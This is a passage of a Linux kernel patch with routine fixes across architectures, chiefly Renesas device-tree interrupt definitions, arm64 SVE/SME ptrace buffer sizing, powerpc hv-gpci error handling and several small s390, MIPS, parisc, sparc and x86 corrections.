++++ b/arch/arm64/boot/dts/renesas/r9a07g043u.dtsi
+@@ -10,3 +10,139 @@
+ #define SOC_PERIPHERAL_IRQ(nr)		GIC_SPI nr
+ 
+ #include "r9a07g043.dtsi"
++
++/ {
++	cpus {
++		#address-cells = <1>;
++		#size-cells = <0>;
++
++		cpu0: cpu@0 {
++			compatible = "arm,cortex-a55";
++			reg = <0>;
++			device_type = "cpu";
++			#cooling-cells = <2>;
++			next-level-cache = <&L3_CA55>;
++			enable-method = "psci";
++			clocks = <&cpg CPG_CORE R9A07G043_CLK_I>;
++			operating-points-v2 = <&cluster0_opp>;
++		};
++
++		L3_CA55: cache-controller-0 {
++			compatible = "cache";
++			cache-unified;
++			cache-size = <0x40000>;
++		};
++	};
++
++	psci {
++		compatible = "arm,psci-1.0", "arm,psci-0.2";
++		method = "smc";
++	};
++
++	timer {
++		compatible = "arm,armv8-timer";
++		interrupts-extended = <&gic GIC_PPI 13 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
++				      <&gic GIC_PPI 14 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
++				      <&gic GIC_PPI 11 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
++				      <&gic GIC_PPI 10 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>;
++	};
++};
++
++&soc {
++	interrupt-parent = <&gic>;
++
++	irqc: interrupt-controller@110a0000 {
++		compatible = "renesas,r9a07g043u-irqc",
++			     "renesas,rzg2l-irqc";
++		reg = <0 0x110a0000 0 0x10000>;
++		#interrupt-cells = <2>;
++		#address-cells = <0>;
++		interrupt-controller;
++		interrupts = <SOC_PERIPHERAL_IRQ(0) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(1) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(2) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(3) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(4) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(5) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(6) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(7) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(8) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(444) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(445) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(446) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(447) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(448) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(449) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(450) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(451) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(452) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(453) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(454) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(455) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(456) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(457) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(458) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(459) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(460) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(461) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(462) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(463) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(464) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(465) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(466) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(467) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(468) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(469) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(470) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(471) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(472) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(473) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(474) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(475) IRQ_TYPE_LEVEL_HIGH>,
++			     <SOC_PERIPHERAL_IRQ(25) IRQ_TYPE_EDGE_RISING>,
++			     <SOC_PERIPHERAL_IRQ(34) IRQ_TYPE_EDGE_RISING>,
++			     <SOC_PERIPHERAL_IRQ(35) IRQ_TYPE_EDGE_RISING>,
++			     <SOC_PERIPHERAL_IRQ(36) IRQ_TYPE_EDGE_RISING>,
++			     <SOC_PERIPHERAL_IRQ(37) IRQ_TYPE_EDGE_RISING>,
++			     <SOC_PERIPHERAL_IRQ(38) IRQ_TYPE_EDGE_RISING>,
++			     <SOC_PERIPHERAL_IRQ(39) IRQ_TYPE_EDGE_RISING>;
++		interrupt-names = "nmi",
++				  "irq0", "irq1", "irq2", "irq3",
++				  "irq4", "irq5", "irq6", "irq7",
++				  "tint0", "tint1", "tint2", "tint3",
++				  "tint4", "tint5", "tint6", "tint7",
++				  "tint8", "tint9", "tint10", "tint11",
++				  "tint12", "tint13", "tint14", "tint15",
++				  "tint16", "tint17", "tint18", "tint19",
++				  "tint20", "tint21", "tint22", "tint23",
++				  "tint24", "tint25", "tint26", "tint27",
++				  "tint28", "tint29", "tint30", "tint31",
++				  "bus-err", "ec7tie1-0", "ec7tie2-0",
++				  "ec7tiovf-0", "ec7tie1-1", "ec7tie2-1",
++				  "ec7tiovf-1";
++		clocks = <&cpg CPG_MOD R9A07G043_IA55_CLK>,
++			<&cpg CPG_MOD R9A07G043_IA55_PCLK>;
++		clock-names = "clk", "pclk";
++		power-domains = <&cpg>;
++		resets = <&cpg R9A07G043_IA55_RESETN>;
++	};
++
++	gic: interrupt-controller@11900000 {
++		compatible = "arm,gic-v3";
++		#interrupt-cells = <3>;
++		#address-cells = <0>;
++		interrupt-controller;
++		reg = <0x0 0x11900000 0 0x40000>,
++		      <0x0 0x11940000 0 0x60000>;
++		interrupts = <GIC_PPI 9 IRQ_TYPE_LEVEL_LOW>;
++	};
++};
++
++&sysc {
++	interrupts = <SOC_PERIPHERAL_IRQ(42) IRQ_TYPE_LEVEL_HIGH>,
++		     <SOC_PERIPHERAL_IRQ(43) IRQ_TYPE_LEVEL_HIGH>,
++		     <SOC_PERIPHERAL_IRQ(44) IRQ_TYPE_LEVEL_HIGH>,
++		     <SOC_PERIPHERAL_IRQ(45) IRQ_TYPE_LEVEL_HIGH>;
++	interrupt-names = "lpm_int", "ca55stbydone_int",
++			  "cm33stbyr_int", "ca55_deny";
++};
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g044.dtsi b/arch/arm64/boot/dts/renesas/r9a07g044.dtsi
+index 7dbf6a6292f49..d26488b5a82df 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g044.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g044.dtsi
+@@ -698,7 +698,27 @@ irqc: interrupt-controller@110a0000 {
+ 				     <GIC_SPI 472 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 473 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 474 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 475 IRQ_TYPE_LEVEL_HIGH>;
++				     <GIC_SPI 475 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 25 IRQ_TYPE_EDGE_RISING>,
++				     <GIC_SPI 34 IRQ_TYPE_EDGE_RISING>,
++				     <GIC_SPI 35 IRQ_TYPE_EDGE_RISING>,
++				     <GIC_SPI 36 IRQ_TYPE_EDGE_RISING>,
++				     <GIC_SPI 37 IRQ_TYPE_EDGE_RISING>,
++				     <GIC_SPI 38 IRQ_TYPE_EDGE_RISING>,
++				     <GIC_SPI 39 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "nmi", "irq0", "irq1", "irq2", "irq3",
++					  "irq4", "irq5", "irq6", "irq7",
++					  "tint0", "tint1", "tint2", "tint3",
++					  "tint4", "tint5", "tint6", "tint7",
++					  "tint8", "tint9", "tint10", "tint11",
++					  "tint12", "tint13", "tint14", "tint15",
++					  "tint16", "tint17", "tint18", "tint19",
++					  "tint20", "tint21", "tint22", "tint23",
++					  "tint24", "tint25", "tint26", "tint27",
++					  "tint28", "tint29", "tint30", "tint31",
++					  "bus-err", "ec7tie1-0", "ec7tie2-0",
++					  "ec7tiovf-0", "ec7tie1-1", "ec7tie2-1",
++					  "ec7tiovf-1";
+ 			clocks = <&cpg CPG_MOD R9A07G044_IA55_CLK>,
+ 				 <&cpg CPG_MOD R9A07G044_IA55_PCLK>;
+ 			clock-names = "clk", "pclk";
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g054.dtsi b/arch/arm64/boot/dts/renesas/r9a07g054.dtsi
+index e000510b90a42..b3d37ca942ee3 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g054.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g054.dtsi
+@@ -704,7 +704,27 @@ irqc: interrupt-controller@110a0000 {
+ 				     <GIC_SPI 472 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 473 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 474 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 475 IRQ_TYPE_LEVEL_HIGH>;
++				     <GIC_SPI 475 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 25 IRQ_TYPE_EDGE_RISING>,
++				     <GIC_SPI 34 IRQ_TYPE_EDGE_RISING>,
++				     <GIC_SPI 35 IRQ_TYPE_EDGE_RISING>,
++				     <GIC_SPI 36 IRQ_TYPE_EDGE_RISING>,
++				     <GIC_SPI 37 IRQ_TYPE_EDGE_RISING>,
++				     <GIC_SPI 38 IRQ_TYPE_EDGE_RISING>,
++				     <GIC_SPI 39 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "nmi", "irq0", "irq1", "irq2", "irq3",
++					  "irq4", "irq5", "irq6", "irq7",
++					  "tint0", "tint1", "tint2", "tint3",
++					  "tint4", "tint5", "tint6", "tint7",
++					  "tint8", "tint9", "tint10", "tint11",
++					  "tint12", "tint13", "tint14", "tint15",
++					  "tint16", "tint17", "tint18", "tint19",
++					  "tint20", "tint21", "tint22", "tint23",
++					  "tint24", "tint25", "tint26", "tint27",
++					  "tint28", "tint29", "tint30", "tint31",
++					  "bus-err", "ec7tie1-0", "ec7tie2-0",
++					  "ec7tiovf-0", "ec7tie1-1", "ec7tie2-1",
++					  "ec7tiovf-1";
+ 			clocks = <&cpg CPG_MOD R9A07G054_IA55_CLK>,
+ 				 <&cpg CPG_MOD R9A07G054_IA55_PCLK>;
+ 			clock-names = "clk", "pclk";
+diff --git a/arch/arm64/boot/dts/renesas/ulcb-kf.dtsi b/arch/arm64/boot/dts/renesas/ulcb-kf.dtsi
+index 588b14b66b6fb..f37abfc13fe59 100644
+--- a/arch/arm64/boot/dts/renesas/ulcb-kf.dtsi
++++ b/arch/arm64/boot/dts/renesas/ulcb-kf.dtsi
+@@ -251,6 +251,7 @@ gpio_exp_74: gpio@74 {
+ 		gpio-controller;
+ 		#gpio-cells = <2>;
+ 		interrupt-controller;
++		#interrupt-cells = <2>;
+ 		interrupt-parent = <&gpio6>;
+ 		interrupts = <8 IRQ_TYPE_EDGE_FALLING>;
+ 
+@@ -311,6 +312,7 @@ gpio_exp_75: gpio@75 {
+ 		gpio-controller;
+ 		#gpio-cells = <2>;
+ 		interrupt-controller;
++		#interrupt-cells = <2>;
+ 		interrupt-parent = <&gpio6>;
+ 		interrupts = <4 IRQ_TYPE_EDGE_FALLING>;
+ 	};
+@@ -331,6 +333,7 @@ gpio_exp_76: gpio@76 {
+ 		gpio-controller;
+ 		#gpio-cells = <2>;
+ 		interrupt-controller;
++		#interrupt-cells = <2>;
+ 		interrupt-parent = <&gpio7>;
+ 		interrupts = <3 IRQ_TYPE_EDGE_FALLING>;
+ 	};
+@@ -341,6 +344,7 @@ gpio_exp_77: gpio@77 {
+ 		gpio-controller;
+ 		#gpio-cells = <2>;
+ 		interrupt-controller;
++		#interrupt-cells = <2>;
+ 		interrupt-parent = <&gpio5>;
+ 		interrupts = <9 IRQ_TYPE_EDGE_FALLING>;
+ 	};
+diff --git a/arch/arm64/boot/dts/rockchip/rk356x.dtsi b/arch/arm64/boot/dts/rockchip/rk356x.dtsi
+index f4d6dbbbddcd4..99ad6fc51b584 100644
+--- a/arch/arm64/boot/dts/rockchip/rk356x.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk356x.dtsi
+@@ -596,6 +596,7 @@ vpu: video-codec@fdea0400 {
+ 		compatible = "rockchip,rk3568-vpu";
+ 		reg = <0x0 0xfdea0000 0x0 0x800>;
+ 		interrupts = <GIC_SPI 139 IRQ_TYPE_LEVEL_HIGH>;
++		interrupt-names = "vdpu";
+ 		clocks = <&cru ACLK_VPU>, <&cru HCLK_VPU>;
+ 		clock-names = "aclk", "hclk";
+ 		iommus = <&vdpu_mmu>;
+diff --git a/arch/arm64/include/asm/fpsimd.h b/arch/arm64/include/asm/fpsimd.h
+index da18413712c04..930b0e6c94622 100644
+--- a/arch/arm64/include/asm/fpsimd.h
++++ b/arch/arm64/include/asm/fpsimd.h
+@@ -36,13 +36,13 @@
+  * When we defined the maximum SVE vector length we defined the ABI so
+  * that the maximum vector length included all the reserved for future
+  * expansion bits in ZCR rather than those just currently defined by
+- * the architecture. While SME follows a similar pattern the fact that
+- * it includes a square matrix means that any allocations that attempt
+- * to cover the maximum potential vector length (such as happen with
+- * the regset used for ptrace) end up being extremely large. Define
+- * the much lower actual limit for use in such situations.
++ * the architecture.  Using this length to allocate worst size buffers
++ * results in excessively large allocations, and this effect is even
++ * more pronounced for SME due to ZA.  Define more suitable VLs for
++ * these situations.
+  */
+-#define SME_VQ_MAX	16
++#define ARCH_SVE_VQ_MAX ((ZCR_ELx_LEN_MASK >> ZCR_ELx_LEN_SHIFT) + 1)
++#define SME_VQ_MAX	((SMCR_ELx_LEN_MASK >> SMCR_ELx_LEN_SHIFT) + 1)
+ 
+ struct task_struct;
+ 
+diff --git a/arch/arm64/kernel/ptrace.c b/arch/arm64/kernel/ptrace.c
+index e1f6366b7ccdf..d02dd2be17b3b 100644
+--- a/arch/arm64/kernel/ptrace.c
++++ b/arch/arm64/kernel/ptrace.c
+@@ -1450,7 +1450,8 @@ static const struct user_regset aarch64_regsets[] = {
+ #ifdef CONFIG_ARM64_SVE
+ 	[REGSET_SVE] = { /* Scalable Vector Extension */
+ 		.core_note_type = NT_ARM_SVE,
+-		.n = DIV_ROUND_UP(SVE_PT_SIZE(SVE_VQ_MAX, SVE_PT_REGS_SVE),
++		.n = DIV_ROUND_UP(SVE_PT_SIZE(ARCH_SVE_VQ_MAX,
++					      SVE_PT_REGS_SVE),
+ 				  SVE_VQ_BYTES),
+ 		.size = SVE_VQ_BYTES,
+ 		.align = SVE_VQ_BYTES,
+diff --git a/arch/mips/include/asm/ptrace.h b/arch/mips/include/asm/ptrace.h
+index daf3cf244ea97..b3e4dd6be7e20 100644
+--- a/arch/mips/include/asm/ptrace.h
++++ b/arch/mips/include/asm/ptrace.h
+@@ -60,6 +60,7 @@ static inline void instruction_pointer_set(struct pt_regs *regs,
+                                            unsigned long val)
+ {
+ 	regs->cp0_epc = val;
++	regs->cp0_cause &= ~CAUSEF_BD;
+ }
+ 
+ /* Query offset/name of register from its name/offset */
+diff --git a/arch/parisc/kernel/ftrace.c b/arch/parisc/kernel/ftrace.c
+index 4d392e4ed3584..ac7253891d5ed 100644
+--- a/arch/parisc/kernel/ftrace.c
++++ b/arch/parisc/kernel/ftrace.c
+@@ -78,7 +78,7 @@ void notrace __hot ftrace_function_trampoline(unsigned long parent,
+ #endif
+ }
+ 
+-#ifdef CONFIG_FUNCTION_GRAPH_TRACER
++#if defined(CONFIG_DYNAMIC_FTRACE) && defined(CONFIG_FUNCTION_GRAPH_TRACER)
+ int ftrace_enable_ftrace_graph_caller(void)
+ {
+ 	static_key_enable(&ftrace_graph_enable.key);
+diff --git a/arch/powerpc/include/asm/vmalloc.h b/arch/powerpc/include/asm/vmalloc.h
+index 4c69ece52a31e..59ed89890c902 100644
+--- a/arch/powerpc/include/asm/vmalloc.h
++++ b/arch/powerpc/include/asm/vmalloc.h
+@@ -7,14 +7,14 @@
+ #ifdef CONFIG_HAVE_ARCH_HUGE_VMAP
+ 
+ #define arch_vmap_pud_supported arch_vmap_pud_supported
+-static inline bool arch_vmap_pud_supported(pgprot_t prot)
++static __always_inline bool arch_vmap_pud_supported(pgprot_t prot)
+ {
+ 	/* HPT does not cope with large pages in the vmalloc area */
+ 	return radix_enabled();
+ }
+ 
+ #define arch_vmap_pmd_supported arch_vmap_pmd_supported
+-static inline bool arch_vmap_pmd_supported(pgprot_t prot)
++static __always_inline bool arch_vmap_pmd_supported(pgprot_t prot)
+ {
+ 	return radix_enabled();
+ }
+diff --git a/arch/powerpc/perf/hv-gpci.c b/arch/powerpc/perf/hv-gpci.c
+index 7ff8ff3509f5f..943248a0e9a9d 100644
+--- a/arch/powerpc/perf/hv-gpci.c
++++ b/arch/powerpc/perf/hv-gpci.c
+@@ -164,6 +164,20 @@ static unsigned long single_gpci_request(u32 req, u32 starting_index,
+ 
+ 	ret = plpar_hcall_norets(H_GET_PERF_COUNTER_INFO,
+ 			virt_to_phys(arg), HGPCI_REQ_BUFFER_SIZE);
++
++	/*
++	 * ret value as 'H_PARAMETER' with detail_rc as 'GEN_BUF_TOO_SMALL',
++	 * specifies that the current buffer size cannot accommodate
++	 * all the information and a partial buffer returned.
++	 * Since in this function we are only accessing data for a given starting index,
++	 * we don't need to accommodate whole data and can get required count by
++	 * accessing first entry data.
++	 * Hence hcall fails only incase the ret value is other than H_SUCCESS or
++	 * H_PARAMETER with detail_rc value as GEN_BUF_TOO_SMALL(0x1B).
++	 */
++	if (ret == H_PARAMETER && be32_to_cpu(arg->params.detail_rc) == 0x1B)
++		ret = 0;
++
+ 	if (ret) {
+ 		pr_devel("hcall failed: 0x%lx\n", ret);
+ 		goto out;
+@@ -228,6 +242,7 @@ static int h_gpci_event_init(struct perf_event *event)
+ {
+ 	u64 count;
+ 	u8 length;
++	unsigned long ret;
+ 
+ 	/* Not our event */
+ 	if (event->attr.type != event->pmu->type)
+@@ -258,13 +273,23 @@ static int h_gpci_event_init(struct perf_event *event)
+ 	}
+ 
+ 	/* check if the request works... */
+-	if (single_gpci_request(event_get_request(event),
++	ret = single_gpci_request(event_get_request(event),
+ 				event_get_starting_index(event),
+ 				event_get_secondary_index(event),
+ 				event_get_counter_info_version(event),
+ 				event_get_offset(event),
+ 				length,
+-				&count)) {
++				&count);
++
++	/*
++	 * ret value as H_AUTHORITY implies that partition is not permitted to retrieve
++	 * performance information, and required to set
++	 * "Enable Performance Information Collection" option.
++	 */
++	if (ret == H_AUTHORITY)
++		return -EPERM;
++
++	if (ret) {
+ 		pr_devel("gpci hcall failed\n");
+ 		return -EINVAL;
+ 	}
+diff --git a/arch/powerpc/platforms/embedded6xx/linkstation.c b/arch/powerpc/platforms/embedded6xx/linkstation.c
+index 1830e1ac1f8f0..107a8b60ad0c9 100644
+--- a/arch/powerpc/platforms/embedded6xx/linkstation.c
++++ b/arch/powerpc/platforms/embedded6xx/linkstation.c
+@@ -99,9 +99,6 @@ static void __init linkstation_init_IRQ(void)
+ 	mpic_init(mpic);
+ }
+ 
+-extern void avr_uart_configure(void);
+-extern void avr_uart_send(const char);
+-
+ static void __noreturn linkstation_restart(char *cmd)
+ {
+ 	local_irq_disable();
+diff --git a/arch/powerpc/platforms/embedded6xx/mpc10x.h b/arch/powerpc/platforms/embedded6xx/mpc10x.h
+index 5ad12023e5628..ebc258fa4858d 100644
+--- a/arch/powerpc/platforms/embedded6xx/mpc10x.h
++++ b/arch/powerpc/platforms/embedded6xx/mpc10x.h
+@@ -156,4 +156,7 @@ int mpc10x_disable_store_gathering(struct pci_controller *hose);
+ /* For MPC107 boards that use the built-in openpic */
+ void mpc10x_set_openpic(void);
+ 
++void avr_uart_configure(void);
++void avr_uart_send(const char c);
++
+ #endif	/* __PPC_KERNEL_MPC10X_H */
+diff --git a/arch/powerpc/platforms/pseries/papr_platform_attributes.c b/arch/powerpc/platforms/pseries/papr_platform_attributes.c
+index 526c621b098be..eea2041b270b5 100644
+--- a/arch/powerpc/platforms/pseries/papr_platform_attributes.c
++++ b/arch/powerpc/platforms/pseries/papr_platform_attributes.c
+@@ -101,10 +101,12 @@ static int papr_get_attr(u64 id, struct energy_scale_attribute *esi)
+ 		esi_buf_size = ESI_HDR_SIZE + (CURR_MAX_ESI_ATTRS * max_esi_attrs);
+ 
+ 		temp_buf = krealloc(buf, esi_buf_size, GFP_KERNEL);
+-		if (temp_buf)
++		if (temp_buf) {
+ 			buf = temp_buf;
+-		else
+-			return -ENOMEM;
++		} else {
++			ret = -ENOMEM;
++			goto out_buf;
++		}
+ 
+ 		goto retry;
+ 	}
+diff --git a/arch/riscv/boot/dts/sifive/hifive-unmatched-a00.dts b/arch/riscv/boot/dts/sifive/hifive-unmatched-a00.dts
+index 07387f9c135ca..72b87b08ab444 100644
+--- a/arch/riscv/boot/dts/sifive/hifive-unmatched-a00.dts
++++ b/arch/riscv/boot/dts/sifive/hifive-unmatched-a00.dts
+@@ -123,6 +123,7 @@ pmic@58 {
+ 		interrupt-parent = <&gpio>;
+ 		interrupts = <1 IRQ_TYPE_LEVEL_LOW>;
+ 		interrupt-controller;
++		#interrupt-cells = <2>;
+ 
+ 		onkey {
+ 			compatible = "dlg,da9063-onkey";
+diff --git a/arch/s390/include/uapi/asm/dasd.h b/arch/s390/include/uapi/asm/dasd.h
+index 93d1ccd3304c7..9c49c3d67cd56 100644
+--- a/arch/s390/include/uapi/asm/dasd.h
++++ b/arch/s390/include/uapi/asm/dasd.h
+@@ -78,6 +78,7 @@ typedef struct dasd_information2_t {
+  * 0x040: give access to raw eckd data
+  * 0x080: enable discard support
+  * 0x100: enable autodisable for IFCC errors (default)
++ * 0x200: enable requeue of all requests on autoquiesce
+  */
+ #define DASD_FEATURE_READONLY	      0x001
+ #define DASD_FEATURE_USEDIAG	      0x002
+@@ -88,6 +89,7 @@ typedef struct dasd_information2_t {
+ #define DASD_FEATURE_USERAW	      0x040
+ #define DASD_FEATURE_DISCARD	      0x080
+ #define DASD_FEATURE_PATH_AUTODISABLE 0x100
++#define DASD_FEATURE_REQUEUEQUIESCE   0x200
+ #define DASD_FEATURE_DEFAULT	      DASD_FEATURE_PATH_AUTODISABLE
+ 
+ #define DASD_PARTN_BITS 2
+diff --git a/arch/s390/kernel/cache.c b/arch/s390/kernel/cache.c
+index 7ee3651d00abe..732024ca005ad 100644
+--- a/arch/s390/kernel/cache.c
++++ b/arch/s390/kernel/cache.c
+@@ -166,5 +166,6 @@ int populate_cache_leaves(unsigned int cpu)
+ 			ci_leaf_init(this_leaf++, pvt, ctype, level, cpu);
+ 		}
+ 	}
++	this_cpu_ci->cpu_map_populated = true;
+ 	return 0;
+ }
+diff --git a/arch/s390/kernel/perf_pai_crypto.c b/arch/s390/kernel/perf_pai_crypto.c
+index 6826e2a69a216..f61a652046cfb 100644
+--- a/arch/s390/kernel/perf_pai_crypto.c
++++ b/arch/s390/kernel/perf_pai_crypto.c
+@@ -647,7 +647,7 @@ static int __init attr_event_init(void)
+ 	for (i = 0; i < ARRAY_SIZE(paicrypt_ctrnames); i++) {
+ 		ret = attr_event_init_one(attrs, i);
+ 		if (ret) {
+-			attr_event_free(attrs, i - 1);
++			attr_event_free(attrs, i);
+ 			return ret;
+ 		}
+ 	}
+diff --git a/arch/s390/kernel/perf_pai_ext.c b/arch/s390/kernel/perf_pai_ext.c
+index 74b53c531e0cd..b4d89654183a2 100644
+--- a/arch/s390/kernel/perf_pai_ext.c
++++ b/arch/s390/kernel/perf_pai_ext.c
+@@ -612,7 +612,7 @@ static int __init attr_event_init(void)
+ 	for (i = 0; i < ARRAY_SIZE(paiext_ctrnames); i++) {
+ 		ret = attr_event_init_one(attrs, i);
+ 		if (ret) {
+-			attr_event_free(attrs, i - 1);
++			attr_event_free(attrs, i);
+ 			return ret;
+ 		}
+ 	}
+diff --git a/arch/s390/kernel/vdso32/Makefile b/arch/s390/kernel/vdso32/Makefile
+index 245bddfe9bc0e..cc513add48eb5 100644
+--- a/arch/s390/kernel/vdso32/Makefile
++++ b/arch/s390/kernel/vdso32/Makefile
+@@ -22,7 +22,7 @@ KBUILD_AFLAGS_32 += -m31 -s
+ KBUILD_CFLAGS_32 := $(filter-out -m64,$(KBUILD_CFLAGS))
+ KBUILD_CFLAGS_32 += -m31 -fPIC -shared -fno-common -fno-builtin
+ 
+-LDFLAGS_vdso32.so.dbg += -fPIC -shared -soname=linux-vdso32.so.1 \
++LDFLAGS_vdso32.so.dbg += -shared -soname=linux-vdso32.so.1 \
+ 	--hash-style=both --build-id=sha1 -melf_s390 -T
+ 
+ $(targets:%=$(obj)/%.dbg): KBUILD_CFLAGS = $(KBUILD_CFLAGS_32)
+diff --git a/arch/s390/kernel/vdso64/Makefile b/arch/s390/kernel/vdso64/Makefile
+index 1605ba45ac4c0..42d918d50a1ff 100644
+--- a/arch/s390/kernel/vdso64/Makefile
++++ b/arch/s390/kernel/vdso64/Makefile
+@@ -26,7 +26,7 @@ KBUILD_AFLAGS_64 += -m64 -s
+ 
+ KBUILD_CFLAGS_64 := $(filter-out -m64,$(KBUILD_CFLAGS))
+ KBUILD_CFLAGS_64 += -m64 -fPIC -fno-common -fno-builtin
+-ldflags-y := -fPIC -shared -soname=linux-vdso64.so.1 \
++ldflags-y := -shared -soname=linux-vdso64.so.1 \
+ 	     --hash-style=both --build-id=sha1 -T
+ 
+ $(targets:%=$(obj)/%.dbg): KBUILD_CFLAGS = $(KBUILD_CFLAGS_64)
+diff --git a/arch/s390/kernel/vtime.c b/arch/s390/kernel/vtime.c
+index 9436f3053b88c..003c926a0f4de 100644
+--- a/arch/s390/kernel/vtime.c
++++ b/arch/s390/kernel/vtime.c
+@@ -210,13 +210,13 @@ void vtime_flush(struct task_struct *tsk)
+ 		virt_timer_expire();
+ 
+ 	steal = S390_lowcore.steal_timer;
+-	avg_steal = S390_lowcore.avg_steal_timer / 2;
++	avg_steal = S390_lowcore.avg_steal_timer;
+ 	if ((s64) steal > 0) {
+ 		S390_lowcore.steal_timer = 0;
+ 		account_steal_time(cputime_to_nsecs(steal));
+ 		avg_steal += steal;
+ 	}
+-	S390_lowcore.avg_steal_timer = avg_steal;
++	S390_lowcore.avg_steal_timer = avg_steal / 2;
+ }
+ 
+ static u64 vtime_delta(void)
+diff --git a/arch/sparc/kernel/leon_pci_grpci1.c b/arch/sparc/kernel/leon_pci_grpci1.c
+index e6935d0ac1ec9..c32590bdd3120 100644
+--- a/arch/sparc/kernel/leon_pci_grpci1.c
++++ b/arch/sparc/kernel/leon_pci_grpci1.c
+@@ -696,7 +696,7 @@ static int grpci1_of_probe(struct platform_device *ofdev)
+ 	return err;
+ }
+ 
+-static const struct of_device_id grpci1_of_match[] __initconst = {
++static const struct of_device_id grpci1_of_match[] = {
+ 	{
+ 	 .name = "GAISLER_PCIFBRG",
+ 	 },
+diff --git a/arch/sparc/kernel/leon_pci_grpci2.c b/arch/sparc/kernel/leon_pci_grpci2.c
+index ca22f93d90454..dd06abc61657f 100644
+--- a/arch/sparc/kernel/leon_pci_grpci2.c
++++ b/arch/sparc/kernel/leon_pci_grpci2.c
+@@ -887,7 +887,7 @@ static int grpci2_of_probe(struct platform_device *ofdev)
+ 	return err;
+ }
+ 
+-static const struct of_device_id grpci2_of_match[] __initconst = {
++static const struct of_device_id grpci2_of_match[] = {
+ 	{
+ 	 .name = "GAISLER_GRPCI2",
+ 	 },
+diff --git a/arch/x86/events/amd/core.c b/arch/x86/events/amd/core.c
+index 04f4b96dec6df..fd091b9dd7067 100644
+--- a/arch/x86/events/amd/core.c
++++ b/arch/x86/events/amd/core.c
+@@ -604,7 +604,6 @@ static void amd_pmu_cpu_dead(int cpu)
+ 
+ 	kfree(cpuhw->lbr_sel);
+ 	cpuhw->lbr_sel = NULL;
+-	amd_pmu_cpu_reset(cpu);
+ 
+ 	if (!x86_pmu.amd_nb_constraints)
+ 		return;
